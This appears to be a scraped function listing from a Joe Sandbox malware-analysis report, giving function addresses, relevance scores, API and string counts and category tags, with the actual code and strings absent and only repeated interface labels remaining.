Function 0045FBAC Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 147windowCOMMON
APIs |
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0044BBD2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 105filestringCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00434034 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 49windowCOMMON
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0041793C Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 40COMMONLIBRARYCODE
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0046822A Relevance: 12.3, APIs: 8, Instructions: 267COMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0044B489 Relevance: 12.1, APIs: 8, Instructions: 102fileCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00415214 Relevance: 12.1, APIs: 8, Instructions: 66threadCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0044734F Relevance: 10.7, APIs: 7, Instructions: 210COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0044982A Relevance: 10.6, APIs: 7, Instructions: 135COMMON
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00448AB2 Relevance: 10.6, APIs: 7, Instructions: 98windowCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00450B7C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80windowCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00455531 Relevance: 10.6, APIs: 7, Instructions: 75windowCOMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00433DF5 Relevance: 10.6, APIs: 7, Instructions: 69COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0041F6F9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68COMMONLIBRARYCODE
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00413D7F Relevance: 10.6, APIs: 7, Instructions: 63threadCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00436C6E Relevance: 10.5, APIs: 7, Instructions: 49threadCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00413D1A Relevance: 10.5, APIs: 7, Instructions: 34threadCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0043028B Relevance: 9.3, APIs: 6, Instructions: 255COMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004577E9 Relevance: 9.2, APIs: 6, Instructions: 217COMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00444BFC Relevance: 9.2, APIs: 6, Instructions: 163COMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00451B42 Relevance: 9.1, APIs: 6, Instructions: 144memoryCOMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00447BA8 Relevance: 9.1, APIs: 6, Instructions: 119COMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0044900D Relevance: 9.1, APIs: 6, Instructions: 111windowCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00440A0D Relevance: 9.1, APIs: 6, Instructions: 111windowCOMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00448804 Relevance: 9.1, APIs: 6, Instructions: 92windowCOMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00441078 Relevance: 9.1, APIs: 6, Instructions: 86COMMON
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00471A38 Relevance: 9.1, APIs: 6, Instructions: 79windowCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00455616 Relevance: 9.1, APIs: 6, Instructions: 78windowCOMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0044389A Relevance: 9.1, APIs: 6, Instructions: 76COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00455168 Relevance: 9.1, APIs: 6, Instructions: 75windowCOMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00436E94 Relevance: 9.1, APIs: 6, Instructions: 75processCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004552FA Relevance: 9.1, APIs: 6, Instructions: 72windowCOMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004556C8 Relevance: 9.1, APIs: 6, Instructions: 67windowCOMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004331A2 Relevance: 9.1, APIs: 6, Instructions: 64sleepCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004555A8 Relevance: 9.1, APIs: 6, Instructions: 61windowCOMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00447275 Relevance: 9.0, APIs: 6, Instructions: 50COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0044CC51 Relevance: 9.0, APIs: 6, Instructions: 50COMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0044B63B Relevance: 9.0, APIs: 6, Instructions: 40synchronizationthreadCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004151BB Relevance: 9.0, APIs: 6, Instructions: 29threadCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0045F790 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 216windowCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00448480 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 107windowCOMMON
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00469CDB Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 100windowCOMMON
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00401B80 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 91windowCOMMON
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00461554 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 74windowCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00462A31 Relevance: 7.7, APIs: 5, Instructions: 227COMMON
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004757A7 Relevance: 7.7, APIs: 5, Instructions: 220COMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0047D40F Relevance: 7.6, APIs: 5, Instructions: 120sleepCOMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0045C3C1 Relevance: 7.6, APIs: 5, Instructions: 118COMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00436A0B Relevance: 7.6, APIs: 5, Instructions: 103COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00449555 Relevance: 7.6, APIs: 5, Instructions: 96windowCOMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004478AC Relevance: 7.6, APIs: 5, Instructions: 96windowCOMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004479A0 Relevance: 7.6, APIs: 5, Instructions: 96COMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00447BF1 Relevance: 7.6, APIs: 5, Instructions: 95COMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004487EA Relevance: 7.6, APIs: 5, Instructions: 89COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004550FC Relevance: 7.6, APIs: 5, Instructions: 78COMMON
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00445870 Relevance: 7.6, APIs: 5, Instructions: 78windowCOMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00459EF1 Relevance: 7.6, APIs: 5, Instructions: 73COMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004653C8 Relevance: 7.6, APIs: 5, Instructions: 72networkCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0044719B Relevance: 7.6, APIs: 5, Instructions: 70COMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00434582 Relevance: 7.6, APIs: 5, Instructions: 61sleepCOMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004556A0 Relevance: 7.5, APIs: 5, Instructions: 45windowCOMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004555ED Relevance: 7.5, APIs: 5, Instructions: 43windowCOMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00455607 Relevance: 7.5, APIs: 5, Instructions: 42windowCOMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0042FD29 Relevance: 7.5, APIs: 5, Instructions: 36COMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00413D0E Relevance: 7.5, APIs: 5, Instructions: 24threadCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004151AF Relevance: 7.5, APIs: 5, Instructions: 22threadCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0043659E Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 162windowCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0044A856 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122networkCOMMON
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0045FA41 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120windowCOMMON
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00434B02 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 108libraryloaderCOMMON
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00450D6B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 102windowCOMMON
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00450ACC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74windowCOMMON
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004496E9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55windowCOMMON
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004312CC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
APIs |
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004312FE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
APIs |
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0043129A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
APIs |
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00430C7F Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
APIs |
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00430DC1 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
APIs |
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00430E7B Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
APIs |
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0040EF60 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
APIs |
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00451D2B Relevance: 6.4, APIs: 4, Instructions: 405COMMON
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00479500 Relevance: 6.2, APIs: 4, Instructions: 162memoryCOMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0046993E Relevance: 6.1, APIs: 4, Instructions: 149windowCOMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004499DB Relevance: 6.1, APIs: 4, Instructions: 145COMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00441672 Relevance: 6.1, APIs: 4, Instructions: 116windowCOMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0045D1AF Relevance: 6.1, APIs: 4, Instructions: 103fileCOMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0045039B Relevance: 6.1, APIs: 4, Instructions: 102COMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00461F53 Relevance: 6.1, APIs: 4, Instructions: 93windowCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00442A83 Relevance: 6.1, APIs: 4, Instructions: 87windowCOMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0047438B Relevance: 6.1, APIs: 4, Instructions: 83COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004494A5 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0046888B Relevance: 6.1, APIs: 4, Instructions: 80COMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0047A26A Relevance: 6.1, APIs: 4, Instructions: 78COMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00434CC9 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 75stringCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0046D402 Relevance: 6.1, APIs: 4, Instructions: 73networkCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00448C3C Relevance: 6.1, APIs: 4, Instructions: 72windowCOMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00458A61 Relevance: 6.1, APIs: 4, Instructions: 71networkCOMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004368A0 Relevance: 6.1, APIs: 4, Instructions: 69windowCOMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004301F8 Relevance: 6.1, APIs: 4, Instructions: 57windowCOMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00443C87 Relevance: 6.1, APIs: 4, Instructions: 57synchronizationthreadwindowCOMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00430B87 Relevance: 6.1, APIs: 4, Instructions: 53COMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00433908 Relevance: 6.0, APIs: 4, Instructions: 50COMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00434963 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0041F584 Relevance: 6.0, APIs: 4, Instructions: 41COMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004556BE Relevance: 6.0, APIs: 4, Instructions: 40windowCOMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0044B5E8 Relevance: 6.0, APIs: 4, Instructions: 37COMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004472F1 Relevance: 6.0, APIs: 4, Instructions: 35COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00472B63 Relevance: 6.0, APIs: 4, Instructions: 27COMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00472BB2 Relevance: 6.0, APIs: 4, Instructions: 27COMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0041514D Relevance: 6.0, APIs: 4, Instructions: 16threadCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00467215 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 181shareCOMMON
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004667E1 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 114networkCOMMON
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0044835A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 99windowCOMMON
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00451006 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 75windowCOMMON
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00451321 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73windowCOMMON
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00476CA4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72sleepCOMMON
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00465225 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61networkCOMMON
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0044256C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59networkCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00469ED9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57windowCOMMON
APIs |
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00469F6A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54windowCOMMON
APIs |
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004560F2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36windowCOMMON
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00442651 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22networkCOMMON
APIs |
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00441BE8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17windowCOMMON
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00441C20 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17windowCOMMON
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004370C3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 8windowCOMMON
APIs |
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|